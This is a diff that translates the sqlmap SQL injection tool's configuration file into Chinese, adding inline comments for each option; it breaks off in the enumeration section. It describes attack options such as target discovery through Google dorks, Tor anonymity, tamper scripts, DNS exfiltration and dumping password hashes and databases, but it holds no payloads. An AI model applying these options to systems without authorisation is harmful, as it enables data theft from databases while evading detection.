+# 至少要指定以下选项中的一个，以设置源并获取目标 URL。
 [Target]
 
-# Target URL.
-# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
-url =
+# 目标 URL。
+# 示例： http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
+url =  # 这里填写待扫描的目标网址
 
-# Direct connection to the database.
-# Examples:
+# 直接连接到数据库。
+# 示例：
 #   mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
 #   oracle://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_SID
-direct = 
+direct =  # 这里填写直接连接数据库所需的连接字符串
 
-# Parse targets from Burp or WebScarab logs
-# Valid: Burp proxy (http://portswigger.net/suite/) requests log file path
-# or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
-# 'conversations/' folder path
-logFile = 
+# 从 Burp 或 WebScarab 日志中解析目标
+# 有效值：Burp 代理的请求日志文件路径（http://portswigger.net/suite/） 
+# 或 WebScarab 代理的 conversations/ 文件夹路径（http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project）
+logFile =  # 这里填写 Burp 或 WebScarab 日志文件的路径
 
-# Scan multiple targets enlisted in a given textual file
-bulkFile =
+# 从给定的文本文件中扫描多个目标
+bulkFile =  # 这里填写包含多个目标网址的文本文件路径
 
-# Load HTTP request from a file
-# Example (file content): POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme
-requestFile = 
+# 从文件加载 HTTP 请求
+# 示例（文件内容）：POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme
+requestFile =  # 这里填写包含 HTTP 请求的文件路径
 
-# Rather than providing a target URL, let Google return target
-# hosts as result of your Google dork expression. For a list of Google
-# dorks see Johnny Long Google Hacking Database at
-# http://johnny.ihackstuff.com/ghdb.php.
-# Example: +ext:php +inurl:"&id=" +intext:"powered by "
-googleDork = 
+# 不提供目标 URL，而是让 Google 根据 Google dork 表达式返回目标主机。
+# 有关 Google dork 的列表，请参见 Johnny Long 的 Google Hacking Database 
+# (http://johnny.ihackstuff.com/ghdb.php)。
+# 示例： +ext:php +inurl:"&id=" +intext:"powered by "
+googleDork =  # 这里填写 Google dork 查询字符串
 
-
-# These options can be used to specify how to connect to the target URL.
+# 这些选项可用于指定如何连接到目标 URL。
 [Request]
 
-# Force usage of given HTTP method (e.g. PUT).
-method = 
+# 强制使用指定的 HTTP 方法（例如 PUT）。
+method =  # 这里填写 HTTP 方法（如 GET 或 POST）
 
-# Data string to be sent through POST (e.g. "id=1").
-data = 
+# 要通过 POST 发送的数据字符串（例如 "id=1"）。
+data =  # 这里填写要发送的 POST 数据
 
-# Character used for splitting parameter values (e.g. &).
-paramDel = 
+# 用于分隔参数值的字符（例如 &）。
+paramDel =  # 这里填写参数分隔符
 
-# HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..").
-cookie = 
+# HTTP Cookie 头的值（例如 "PHPSESSID=a8d127e.."）。
+cookie =  # 这里填写 HTTP Cookie 的值
 
-# Character used for splitting cookie values (e.g. ;).
-cookieDel = 
+# 用于分隔 Cookie 值的字符（例如 ;）。
+cookieDel =  # 这里填写 Cookie 分隔符
 
-# Live cookies file used for loading up-to-date values.
-liveCookies = 
+# 用于加载最新值的实时 Cookie 文件。
+liveCookies =  # 这里填写实时 Cookie 文件的路径
 
-# File containing cookies in Netscape/wget format.
-loadCookies = 
+# 包含 Netscape/wget 格式的 Cookie 的文件。
+loadCookies =  # 这里填写包含 Cookie 的文件路径
 
-# Ignore Set-Cookie header from response.
-# Valid: True or False
-dropSetCookie = False
+# 忽略响应中的 Set-Cookie 头。
+# 有效值： True 或 False
+dropSetCookie = False  # 设置为 True 则忽略响应中的 Set-Cookie 头
 
-# HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value
-# at each HTTP request.
-# sqlmap will also test for SQL injection on the HTTP User-Agent value.
-agent =
+# HTTP User-Agent 头的值。用于在每个 HTTP 请求中伪装 HTTP User-Agent 头的值。
+# sqlmap 还将测试 HTTP User-Agent 值是否存在 SQL 注入。
+agent =  # 这里填写自定义 User-Agent 值
 
-# Imitate smartphone through HTTP User-Agent header.
-# Valid: True or False
-mobile = False
+# 通过 HTTP User-Agent 头模拟智能手机。
+# 有效值： True 或 False
+mobile = False  # 设置为 True 将通过 User-Agent 模拟智能手机
 
-# Use randomly selected HTTP User-Agent header value.
-# Valid: True or False
-randomAgent = False
+# 使用随机选择的 HTTP User-Agent 头值。
+# 有效值： True 或 False
+randomAgent = False  # 设置是否随机使用 User-Agent 头，默认值为 False
 
-# HTTP Host header value.
-host = 
+# HTTP Host 头的值。
+host =  # 这里填写 HTTP 请求中的主机名
 
-# HTTP Referer header. Useful to fake the HTTP Referer header value at
-# each HTTP request.
-referer = 
+# HTTP Referer 头。用于在每个 HTTP 请求中伪装 HTTP Referer 头的值。
+referer =  # 这里填写 HTTP Referer 的值
 
-# Extra HTTP headers
+# 额外的 HTTP 头
 headers = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  Accept-Language: en-us,en;q=0.5
  Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
+# 这里填写其他自定义的 HTTP 头，可以指定多个头信息
 
-# HTTP Authentication type. Useful only if the target URL requires
-# HTTP Basic, Digest, Bearer or NTLM authentication and you have such data.
-# Valid: Basic, Digest, Bearer, NTLM or PKI
-authType = 
+# HTTP 身份验证类型。仅当目标 URL 需要以下身份验证时有用：
+# HTTP 基本认证、摘要认证、Bearer 或 NTLM 认证，且您有相关数据。
+# 有效值： Basic、Digest、Bearer、NTLM 或 PKI
+authType =  # 这里填写认证类型
 
-# HTTP authentication credentials. Useful only if the target URL requires
-# HTTP Basic, Digest, Token or NTLM authentication and you have such data.
-# Syntax: username:password
-authCred = 
+# HTTP 身份验证凭据。仅当目标 URL 需要以下身份验证时有用：
+# HTTP 基本认证、摘要认证、Token 或 NTLM 认证，且您有相关数据。
+# 语法： username:password
+authCred =  # 这里填写身份验证凭据
 
-# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires
-# PKI authentication and you have such data.
-# Syntax: key_file
-authFile = 
+# HTTP 认证 PEM 私钥/证书文件。仅当目标 URL 需要 PKI 认证时有用，且您有相关数据。
+# 语法： key_file
+authFile =  # 这里填写 PEM 文件的路径
 
-# Abort on (problematic) HTTP error code (e.g. 401).
-# Valid: string
-abortCode =
+# 在（存在问题的）HTTP 错误代码上中止（例如 401）。
+# 有效值：字符串
+abortCode =  # 这里填写需要中止的 HTTP 错误代码
 
-# Ignore (problematic) HTTP error code (e.g. 401).
-# Valid: string
-ignoreCode =
+# 忽略（存在问题的）HTTP 错误代码（例如 401）。
+# 有效值：字符串
+ignoreCode =  # 这里填写要忽略的 HTTP 错误代码
 
-# Ignore system default proxy settings.
-# Valid: True or False
-ignoreProxy = False
+# 忽略系统默认代理设置。
+# 有效值： True 或 False
+ignoreProxy = False  # 设置为 True 将忽略系统的代理设置
 
-# Ignore redirection attempts.
-# Valid: True or False
-ignoreRedirects = False
+# 忽略重定向尝试。
+# 有效值： True 或 False
+ignoreRedirects = False  # 设置为 True 将忽略 HTTP 重定向
 
-# Ignore connection timeouts.
-# Valid: True or False
-ignoreTimeouts = False
+# 忽略连接超时。
+# 有效值： True 或 False
+ignoreTimeouts = False  # 设置为 True 将忽略连接超时的错误
 
-# Use a proxy to connect to the target URL.
-# Syntax: (http|https|socks4|socks5)://address:port
-proxy = 
+# 使用代理连接到目标 URL。
+# 语法： (http|https|socks4|socks5)://address:port
+proxy =  # 这里填写代理服务器的地址和端口
 
-# Proxy authentication credentials. Useful only if the proxy requires
-# Basic or Digest authentication and you have such data.
-# Syntax: username:password
-proxyCred =
+# 代理身份验证凭据。仅当代理需要以下认证时有用：
+# 基本认证或摘要认证，且您有相关数据。
+# 语法： username:password
+proxyCred =  # 这里填写代理的身份验证凭据
 
-# Load proxy list from a file
-proxyFile =
+# 从文件加载代理列表。
+proxyFile =  # 这里填写包含代理地址的文件路径
 
-# Use Tor anonymity network.
-# Valid: True or False
-tor = False
+# 使用 Tor 匿名网络。
+# 有效值： True 或 False
+tor = False  # 设置为 True 将通过 Tor 网络发送请求
 
-# Set Tor proxy port other than default.
-# Valid: integer
-# torPort =
+# 设置 Tor 代理端口，非默认值。
+# 有效值： 整数
+# torPort =  # 这里可以填写 Tor 代理的端口，默认是 9050
 
-# Set Tor proxy type.
-# Valid: HTTP, SOCKS4, SOCKS5
-torType = SOCKS5
+# 设置 Tor 代理类型。
+# 有效值： HTTP、SOCKS4、SOCKS5
+torType = SOCKS5  # 这里设置使用的 Tor 代理类型，默认是 SOCKS5
 
-# Check to see if Tor is used properly.
-# Valid: True or False
-checkTor = False
+# 检查 Tor 是否正确使用。
+# 有效值： True 或 False
+checkTor = False  # 设置为 True 将检查 Tor 连接是否正常
 
-# Delay in seconds between each HTTP request.
-# Valid: float
-# Default: 0
-delay = 0
+# 每个 HTTP 请求之间的延迟（秒）。
+# 有效值：浮点数
+# 默认值： 0
+delay = 0  # 这里可以设置发送请求之间的延迟时间
 
-# Seconds to wait before timeout connection.
-# Valid: float
-# Default: 30
-timeout = 30
+# 等待超时连接之前的秒数。
+# 有效值：浮点数
+# 默认值： 30
+timeout = 30  # 这里可以设置连接超时的等待时间
 
-# Maximum number of retries when the HTTP connection timeouts.
-# Valid: integer
-# Default: 3
-retries = 3
+# 当 HTTP 连接超时时的最大重试次数。
+# 有效值：整数
+# 默认值： 3
+retries = 3  # 这里可以设置在超时情况下重试的最大次数
 
-# Retry request on regexp matching content.
-retryOn =
+# 在正则表达式匹配内容上重试请求。
+retryOn =  # 这里填写正则表达式，用于重试请求
 
-# Randomly change value for the given parameter.
-rParam = 
+# 随机改变给定参数的值。
+rParam =  # 这里填写要随机改变的参数
 
-# URL address to visit frequently during testing.
-# Example: http://192.168.1.121/index.html
-safeUrl = 
+# 在测试期间访问的 URL 地址。
+# 示例： http://192.168.1.121/index.html
+safeUrl =  # 这里填写安全 URL 的地址，供频繁访问
 
-# POST data to send to a safe URL.
-# Example: username=admin&password=passw0rd!
-safePost = 
+# 要发送到安全 URL 的 POST 数据。
+# 示例： username=admin&password=passw0rd!
+safePost =  # 这里填写 POST 数据，用于安全 URL 请求
 
-# Load safe HTTP request from a file.
-safeReqFile = 
+# 从文件加载安全 HTTP 请求。
+safeReqFile =  # 这里填写包含安全 HTTP 请求的文件路径
 
-# Regular requests between visits to a safe URL (default 0).
-# Valid: integer
-# Default: 0
-safeFreq = 0
+# 访问安全 URL 之间的常规请求（默认值 0）。
+# 有效值：整数
+# 默认值： 0
+safeFreq = 0  # 这里可以设置访问安全 URL 之间的常规请求频率
 
-# Skip URL encoding of payload data.
-# Valid: True or False
-skipUrlEncode = False
+# 跳过有效负载数据的 URL 编码。
+# 有效值： True 或 False
+skipUrlEncode = False  # 设置为 True 则不对有效负载数据进行 URL 编码
 
-# Parameter used to hold anti-CSRF token.
-csrfToken = 
+# 用于持有 anti-CSRF 令牌的参数。
+csrfToken =  # 这里填写用来存储 anti-CSRF 令牌的参数
 
-# URL address to visit to extract anti-CSRF token
-csrfUrl = 
+# 提取 anti-CSRF 令牌的 URL 地址。
+csrfUrl =  # 这里填写用于提取 anti-CSRF 令牌的 URL
 
-# HTTP method to use during anti-CSRF token page visit.
-csrfMethod =
+# 在获取 anti-CSRF 令牌页面访问时使用的 HTTP 方法。
+csrfMethod =  # 这里填写获取 anti-CSRF 令牌时使用的 HTTP 方法
 
-# POST data to send during anti-CSRF token page visit.
-csrfData =
+# 在获取 anti-CSRF 令牌页面访问时发送的 POST 数据。
+csrfData =  # 这里填写获取 anti-CSRF 令牌时发送的 POST 数据
 
-# Retries for anti-CSRF token retrieval.
-csrfRetries =
+# 获取 anti-CSRF 令牌时的重试次数。
+csrfRetries =  # 这里填写获取 anti-CSRF 令牌的重试次数
 
-# Force usage of SSL/HTTPS
-# Valid: True or False
-forceSSL = False
+# 强制使用 SSL/HTTPS。
+# 有效值： True 或 False
+forceSSL = False  # 设置为 True 将强制使用 SSL 进行连接
 
-# Use HTTP chunked transfer encoded requests.
-# Valid: True or False
-chunked = False
+# 使用 HTTP 切块传输编码请求。
+# 有效值： True 或 False
+chunked = False  # 设置为 True 将使用切块传输编码
 
-# Use HTTP parameter pollution.
-# Valid: True or False
-hpp = False
+# 使用 HTTP 参数污染。
+# 有效值： True 或 False
+hpp = False  # 设置为 True 将启用 HTTP 参数污染功能
 
-# Evaluate provided Python code before the request.
-# Example: import hashlib;id2=hashlib.md5(id).hexdigest()
-evalCode = 
+# 在请求之前评估提供的 Python 代码。
+# 示例： import hashlib;id2=hashlib.md5(id).hexdigest()
+evalCode =  # 这里可以填写要执行的 Python 代码，作为请求前的预处理
 
-# These options can be used to optimize the performance of sqlmap.
+# 这些选项可用于优化 sqlmap 的性能。
 [Optimization]
 
-# Use all optimization options.
-# Valid: True or False
-optimize = False
-
-# Predict common queries output.
-# Valid: True or False
-predictOutput = False
+# 使用所有优化选项。
+# 有效值： True 或 False
+optimize = False  # 设置为 True 则启用所有优化选项，默认为 False
 
-# Use persistent HTTP(s) connections.
-keepAlive = False
+# 预测常见查询的输出。
+# 有效值： True 或 False
+predictOutput = False  # 设置为 True 将启用对常见查询输出的预测优化，默认为 False
 
-# Retrieve page length without actual HTTP response body.
-# Valid: True or False
-nullConnection = False
+# 使用持久的 HTTP(s) 连接。
+keepAlive = False  # 设置为 True 使用持久连接，默认为 False，每次请求都新建连接
 
-# Maximum number of concurrent HTTP(s) requests (handled with Python threads)
-# to be used in the inference SQL injection attack.
-# Valid: integer
-# Default: 1
-threads = 1
+# 在不实际响应 HTTP 响应体的情况下检索页面长度。
+# 有效值： True 或 False
+nullConnection = False  # 设置为 True 将使用 Null 连接，只获取响应头信息，默认为 False
 
+# 最大并发 HTTP(s) 请求数（使用 Python 线程处理）
+# 在推断 SQL 注入攻击中使用。
+# 有效值：整数
+# 默认值： 1
+threads = 1  # 设置并发请求的最大数量，默认为 1，表示一次一个请求
 
-# These options can be used to specify which parameters to test for,
-# provide custom injection payloads and optional tampering scripts.
+# 这些选项可以用来指定要测试的参数，提供自定义注入有效负载和可选的篡改脚本。
 [Injection]
 
-# Testable parameter(s) comma separated. By default all GET/POST/Cookie
-# parameters and HTTP User-Agent are tested by sqlmap.
-testParameter = 
-
-# Skip testing for given parameter(s).
-skip =
+# 可测试的参数，以逗号分隔。默认情况下，sqlmap 会测试所有 GET/POST/Cookie
+# 参数和 HTTP User-Agent。
+testParameter =  # 这里填写需要测试的参数名称，默认测试所有参数
 
-# Skip testing parameters that not appear to be dynamic.
-# Valid: True or False
-skipStatic = False
+# 跳过给定的参数。
+skip =  # 这里填写需要跳过测试的参数，以逗号分隔
 
-# Regexp to exclude parameters from testing (e.g. "ses").
-paramExclude =
+# 跳过不看起来动态的参数测试。
+# 有效值： True 或 False
+skipStatic = False  # 设置为 True 跳过静态参数的测试，默认为 False 
 
-# Select testable parameter(s) by place (e.g. "POST").
-paramFilter =
+# 用于排除参数的正则表达式（例如 "ses"）。
+paramExclude =  # 这里填写正则表达式，将排除匹配的参数
 
-# Force back-end DBMS to provided value. If this option is set, the back-end
-# DBMS identification process will be minimized as needed.
-# If not set, sqlmap will detect back-end DBMS automatically by default.
-# Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3,
-# access, firebird, maxdb, sybase
-dbms = 
+# 通过位置选择可测试的参数（例如 "POST"）。
+paramFilter =  # 这里填写过滤参数的位置（如 GET、POST）
 
-# DBMS authentication credentials (user:password). Useful if you want to
-# run SQL statements as another user, the back-end database management
-# system is PostgreSQL or Microsoft SQL Server and the parameter is
-# vulnerable by stacked queries SQL injection or you are connecting directly
-# to the DBMS (-d switch).
-# Syntax: username:password
-dbmsCred = 
+# 强制后端数据库管理系统使用提供的值。如果设置此选项，则后端
+# 数据库管理系统识别过程将尽量减少需要。
+# 如果未设置，sqlmap 将默认为自动检测后端数据库管理系统。
+# 有效值：mssql、mysql、mysql 4、mysql 5、oracle、pgsql、sqlite、sqlite3、
+# access、firebird、maxdb、sybase
+dbms =  # 这里填写强制使用的数据库类型
 
-# Force back-end DBMS operating system to provided value. If this option is
-# set, the back-end DBMS identification process will be minimized as
-# needed.
-# If not set, sqlmap will detect back-end DBMS operating system
-# automatically by default.
-# Valid: linux, windows
-os = 
+# 数据库管理系统的身份验证凭据（用户：密码）。如果您想
+# 以其他用户身份运行 SQL 语句，该后端数据库管理系统为
+# PostgreSQL 或 Microsoft SQL Server，并且参数
+# 是通过堆叠查询的 SQL 注入攻击脆弱或您直接连接到 DBMS（-d 选项）。
+# 语法： username:password
+dbmsCred =  # 这里填写数据库登录的凭据
 
-# Use big numbers for invalidating values.
-# Valid: True or False
-invalidBignum = False
+# 强制后端数据库管理系统操作系统使用提供的值。如果设置此选项，
+# 则后端数据库管理系统识别过程将尽量减少需要。
+# 如果未设置，sqlmap 将默认为自动检测后端数据库管理系统操作系统。
+# 有效值：linux、windows
+os =  # 这里填写强制使用的操作系统类型
 
-# Use logical operations for invalidating values.
-# Valid: True or False
-invalidLogical = False
+# 使用大数字来无效化值。
+# 有效值： True 或 False
+invalidBignum = False  # 设置为 True 使用大数字来无效化测试，默认为 False
 
-# Use random strings for invalidating values.
-# Valid: True or False
-invalidString = False
+# 使用逻辑运算来无效化值。
+# 有效值： True 或 False
+invalidLogical = False  # 设置为 True 使用逻辑运算符来无效化测试，默认为 False
 
-# Turn off payload casting mechanism
-# Valid: True or False
-noCast = False
+# 使用随机字符串来无效化值。
+# 有效值： True 或 False
+invalidString = False  # 设置为 True 使用随机字符串来无效化测试，默认为 False
 
-# Turn off string escaping mechanism
-# Valid: True or False
-noEscape = False
+# 关闭有效负载类型转换机制。
+# 有效值： True 或 False
+noCast = False  # 设置为 True 关闭有效负载的类型转换，默认为 False
 
-# Injection payload prefix string.
-prefix = 
+# 关闭字符串转义机制。
+# 有效值： True 或 False
+noEscape = False  # 设置为 True 关闭 SQL 注入时的字符串转义，默认为 False
 
-# Injection payload suffix string.
-suffix = 
+# 注入有效负载前缀字符串。
+prefix =  # 这里填写注入有效负载的前缀字符串
 
-# Use given script(s) for tampering injection data.
-tamper = 
+# 注入有效负载后缀字符串。
+suffix =  # 这里填写注入有效负载的后缀字符串
 
+# 使用给定的脚本来篡改注入数据。
+tamper =  # 这里填写要使用的篡改脚本
 
-# These options can be used to specify how to parse and compare page
-# content from HTTP responses when using blind SQL injection technique.
+# 这些选项可以用来指定如何解析和比较 HTTP 响应内容， 
+# 特别是在使用盲 SQL 注入技术时。
 [Detection]
 
-# Level of tests to perform.
-# The higher the value is, the higher the number of HTTP(s) requests are
-# as well as the better chances to detect a tricky SQL injection.
-# Valid: Integer between 1 and 5
-# Default: 1
-level = 1
-
-# Risk of tests to perform.
-# Note: boolean-based blind SQL injection tests with AND are considered
-# risk 1, with OR are considered risk 3.
-# Valid: Integer between 1 and 3
-# Default: 1
-risk = 1
-
-# String to match within the raw response when the query is evaluated to 
-# True, only needed if the page content dynamically changes at each refresh.
-# Refer to the user's manual for further details.
-string = 
-
-# String to match within the raw response when the query is evaluated to 
-# False, only needed if the page content dynamically changes at each refresh.
-# Refer to the user's manual for further details.
-notString = 
-
-# Regular expression to match within the raw response when the query is
-# evaluated to True, only needed if the needed if the page content
-# dynamically changes at each refresh.
-# Refer to the user's manual for further details.
-# Valid: regular expression with Python syntax
+# 测试执行的级别。
+# 级别越高，发送的 HTTP(s) 请求越多， 
+# 也就越能提高检测复杂 SQL 注入的概率。
+# 有效值： 1 到 5 之间的整数
+# 默认值： 1
+level = 1  # 设置检测级别，默认是最低级别 1
+
+# 执行测试的风险级别。
+# 注意：基于布尔盲 SQL 注入的 AND 被视为风险等级 1,
+# 使用 OR 的情况被视为风险等级 3。
+# 有效值： 1 到 3 之间的整数
+# 默认值： 1
+risk = 1  # 设置测试的风险级别，默认为 1
+
+# 当查询评估为真时，匹配原始响应中的字符串。
+# 仅在页面内容在每次刷新时动态改变时需要指定此项。
+# 请参考用户手册以获取更多详细信息。
+string =  # 这里填写匹配字符串，用来判断查询结果为真时的响应内容
+
+# 当查询评估为假时，匹配原始响应中的字符串。
+# 仅在页面内容在每次刷新时动态改变时需要指定此项。
+# 请参考用户手册以获取更多详细信息。
+notString =  # 这里填写匹配字符串，用来判断查询结果为假的响应内容
+
+# 匹配原始响应中当查询评估为真时的正则表达式。
+# 仅在页面内容在每次刷新时动态改变时需要指定此项。
+# 有效值：具有 Python 语法的正则表达式
 # (http://www.python.org/doc/2.5.2/lib/re-syntax.html)
-regexp = 
+regexp =  # 这里填写正则表达式，用于匹配响应内容
 
-# HTTP response code to match when the query is True.
-# Valid: Integer
-# Example: 200 (assuming any False statement returns a different response
-# code)
-# code = 
+# 当查询为真时匹配的 HTTP 响应代码。
+# 有效值： 整数
+# 示例： 200 （假设任何假的语句返回不同的响应代码）
+# code =  # 这里填写需要匹配的响应代码
 
-# Conduct thorough tests only if positive heuristic(s).
-# Valid: True or False
-smart = False
+# 仅在出现积极启发式结果时进行全面测试。
+# 有效值： True 或 False
+smart = False  # 设置为 True 则在有积极启发式结果时执行全面测试，默认为 False
 
-# Compare pages based only on the textual content.
-# Valid: True or False
-textOnly = False
+# 仅基于文本内容比较页面。
+# 有效值： True 或 False
+textOnly = False  # 设置为 True 则仅通过文本内容进行比较，默认为 False
 
-# Compare pages based only on their titles.
-# Valid: True or False
-titles = False
+# 仅基于页面标题比较页面。
+# 有效值： True 或 False
+titles = False  # 设置为 True 则仅通过页面标题进行比较，默认为 False
 
-
-# These options can be used to tweak testing of specific SQL injection
-# techniques.
+# 这些选项可以用来调整特定 SQL 注入技术的测试。
 [Techniques]
 
-# SQL injection techniques to use.
-# Valid: a string composed by B, E, U, S, T and Q where:
-# B: Boolean-based blind SQL injection
-# E: Error-based SQL injection
-# U: UNION query SQL injection
-# S: Stacked queries SQL injection
-# T: Time-based blind SQL injection
-# Q: Inline SQL injection
-# Example: ES (means test for error-based and stacked queries SQL
-# injection types only)
-# Default: BEUSTQ (means test for all SQL injection types - recommended)
-technique = BEUSTQ
-
-# Seconds to delay the response from the DBMS.
-# Valid: integer
-# Default: 5
-timeSec = 5
-
-# Range of columns to test for.
-# Valid: range of integers
-# Example: 1-10
-uCols = 
-
-# Character to use for bruteforcing number of columns.
-# Valid: string
-# Example: NULL
-uChar = 
-
-# Table to use in FROM part of UNION query SQL injection.
-# Valid: string
-# Example: INFORMATION_SCHEMA.COLLATIONS
-uFrom = 
-
-# Column values to use for UNION query SQL injection.
-# Valid: string
-# Example: NULL,1,*,NULL
-uValues =
-
-# Domain name used for DNS exfiltration attack.
-# Valid: string
-dnsDomain =
-
-# Resulting page URL searched for second-order response.
-# Valid: string
-secondUrl =
-
-# Load second-order HTTP request from file.
-# Valid: string
-secondReq =
-
+# 要使用的 SQL 注入技术。
+# 有效值：一种字符串，由 B、E、U、S、T 和 Q 组成，其中：
+# B: 基于布尔的盲 SQL 注入
+# E: 基于错误的 SQL 注入
+# U: UNION 查询 SQL 注入
+# S: 堆叠查询 SQL 注入
+# T: 基于时间的盲 SQL 注入
+# Q: 内联 SQL 注入
+# 示例： ES （表示仅测试基于错误和堆叠查询的 SQL 注入类型）
+# 默认值： BEUSTQ（表示测试所有 SQL 注入类型 - 推荐）
+technique = BEUSTQ  # 这里填写要使用的 SQL 注入技术
+
+# 延迟从数据库管理系统返回响应的秒数。
+# 有效值： 整数
+# 默认值： 5
+timeSec = 5  # 这里填写延迟的秒数，默认为 5 秒
+
+# 测试的列范围。
+# 有效值：整型范围
+# 示例： 1-10
+uCols =  # 这里填写测试的列范围，例如“1-10”
+
+# 用于强制破解列数的字符。
+# 有效值： 字符串
+# 示例： NULL
+uChar =  # 这里填写用于破解列数的字符
+
+# 在 UNION 查询 SQL 注入的 FROM 部分中使用的表。
+# 有效值： 字符串
+# 示例： INFORMATION_SCHEMA.COLLATIONS
+uFrom =  # 这里填写将用于 UNION 查询的表名
+
+# 用于 UNION 查询 SQL 注入的列值。
+# 有效值： 字符串
+# 示例： NULL,1,*,NULL
+uValues =  # 这里填写用于 UNION 查询的列值
+
+# 用于 DNS 外泄攻击的域名。
+# 有效值：字符串
+dnsDomain =  # 这里填写用于 DNS 外泄攻击的域名
+
+# 搜索到的第二次响应的页面 URL。
+# 有效值：字符串
+secondUrl =  # 这里填写用于寻找第二次响应的页面 URL
+
+# 从文件加载第二次 HTTP 请求。
+# 有效值：字符串
+secondReq =  # 这里填写包含第二次 HTTP 请求的文件路径
 
 [Fingerprint]
 
-# Perform an extensive back-end database management system fingerprint
-# based on various techniques.
-# Valid: True or False
-extensiveFp = False
+# 执行基于各种技术的广泛后端数据库管理系统指纹识别。
+# 有效值： True 或 False
+extensiveFp = False  # 设置为 True 将启用详细指纹识别，默认为 False
 
-
-# These options can be used to enumerate the back-end database
-# management system information, structure and data contained in the
-# tables. Moreover you can run your own SQL statements.
+# 这些选项可以用于枚举后端数据库管理系统的信息、结构和表中包含的数据。
+# 此外，您还可以运行自己的 SQL 语句。
 [Enumeration]
 
-# Retrieve everything
-# Valid: True or False
-getAll = False
+# 检索所有内容。
+# 有效值： True 或 False
+getAll = False  # 设置为 True 将检索所有可用信息，默认为 False
 
-# Retrieve back-end database management system banner.
-# Valid: True or False
-getBanner = False
+# 检索后端数据库管理系统的横幅信息（数据库版本等）。
+# 有效值： True 或 False
+getBanner = False  # 设置为 True 将检索数据库管理系统的版本信息，默认为 False
 
-# Retrieve back-end database management system current user.
-# Valid: True or False
-getCurrentUser = False
+# 检索后端数据库管理系统的当前用户。
+# 有效值： True 或 False
+getCurrentUser = False  # 设置为 True 将检索当前连接的用户，默认为 False
 
-# Retrieve back-end database management system current database.
-# Valid: True or False
-getCurrentDb = False
+# 检索后端数据库管理系统的当前数据库。
+# 有效值： True 或 False
+getCurrentDb = False  # 设置为 True 将检索当前使用的数据库，默认为 False
 
-# Retrieve back-end database management system server hostname.
-# Valid: True or False
-getHostname = False
+# 检索后端数据库管理系统的服务器主机名。
+# 有效值： True 或 False
+getHostname = False  # 设置为 True 将检索数据库服务器的主机名，默认为 False
 
-# Detect if the DBMS current user is DBA.
-# Valid: True or False
-isDba = False
+# 检测 DBMS 当前用户是否为 DBA（数据库管理员）。
+# 有效值： True 或 False
+isDba = False  # 设置为 True 将检查当前用户是否具有 DBA 权限，默认为 False
 
-# Enumerate back-end database management system users.
-# Valid: True or False
-getUsers = False
+# 枚举后端数据库管理系统的用户。
+# 有效值： True 或 False
+getUsers = False  # 设置为 True 将检索数据库中的所有用户信息，默认为 False
 
-# Enumerate back-end database management system users password hashes.
-# Valid: True or False
-getPasswordHashes = False
-
-# Enumerate back-end database management system users privileges.
-# Valid: True or False
-getPrivileges = False
-
-# Enumerate back-end database management system users roles.
-# Valid: True or False
-getRoles = False
-
-# Enumerate back-end database management system databases.
-# Valid: True or False
-getDbs = False
-
-# Enumerate back-end database management system database tables.
-# Optional: db
-# Valid: True or False
-getTables = False
+# 枚举后端数据库管理系统用户的密码哈希。
+# 有效值： True 或 False
+getPasswordHashes = False  # 设置为 True 将获取用户密码的哈希值，默认为 False
 
-# Enumerate back-end database management system database table columns.
-# Optional: db, tbl, col
-# Valid: True or False
-getColumns = False
+# 枚举后端数据库管理系统用户的权限。
+# 有效值： True 或 False
+getPrivileges = False  # 设置为 True 将检索用户权限，默认为 False
 
-# Enumerate back-end database management system schema.
-# Valid: True or False
-getSchema = False
+# 枚举后端数据库管理系统用户的角色。
+# 有效值： True 或 False
+getRoles = False  # 设置为 True 将检索用户角色信息，默认为 False
 
-# Retrieve number of entries for table(s).
-# Valid: True or False
-getCount = False
+# 枚举后端数据库管理系统的数据库列表。
+# 有效值： True 或 False
+getDbs = False  # 设置为 True 将检索所有数据库名，默认为 False
 
-# Dump back-end database management system database table entries.
-# Requires: tbl and/or col
-# Optional: db
-# Valid: True or False
-dumpTable = False
+# 枚举后端数据库管理系统数据库的表。
+# 可选： db
+# 有效值： True 或 False
+getTables = False  # 设置为 True 将检索特定数据库中的所有表，默认为 False
 
-# Dump all back-end database management system databases tables entries.
-# Valid: True or False
-dumpAll = False
+# 枚举后端数据库管理系统数据库表的列。
+# 可选： db, tbl, col
+# 有效值： True 或 False
+getColumns = False  # 设置为 True 将检索特定表中的所有列，默认为 False
 
-# Search column(s), table(s) and/or database name(s).
-# Requires: db, tbl or col
-# Valid: True or False
-search = False
+# 枚举后端数据库管理系统的架构。
+# 有效值： True 或 False
+getSchema = False  # 设置为 True 将检索数据库的架构信息，默认为 False
 
-# Check for database management system database comments during enumeration.
-# Valid: True or False
-getComments = False
+# 检索表（们）中的条目数量。
+# 有效值： True 或 False
+getCount = False  # 设置为 True 将获取表中的记录数，默认为 False
 
-# Retrieve SQL statements being run on database management system.
-# Valid: True or False
-getStatements = False
+# 转储后端数据库管理系统数据库表的条目。
+# 需要： tbl 和/或 col
+# 可选： db
+# 有效值： True 或 False
+dumpTable = False  # 设置为 True 将导出特定表的所有数据，默认为 False
 
-# Back-end database management system database to enumerate.
-db = 
+# 转储所有后端数据库管理系统数据库表的条目。
+# 有效值： True 或 False
+dumpAll = False  # 设置为 True 将导出所有数据库表的数据，默认为 False
 
-# Back-end database management system database table(s) to enumerate.
-tbl = 
+# 搜索列、表和/或数据库名称。
+# 需要： db、tbl 或 col
+# 有效值： True 或 False
+search = False  # 设置为 True 将进行特定名称的搜索，默认为 False
 
-# Back-end database management system database table column(s) to enumerate.
-col = 
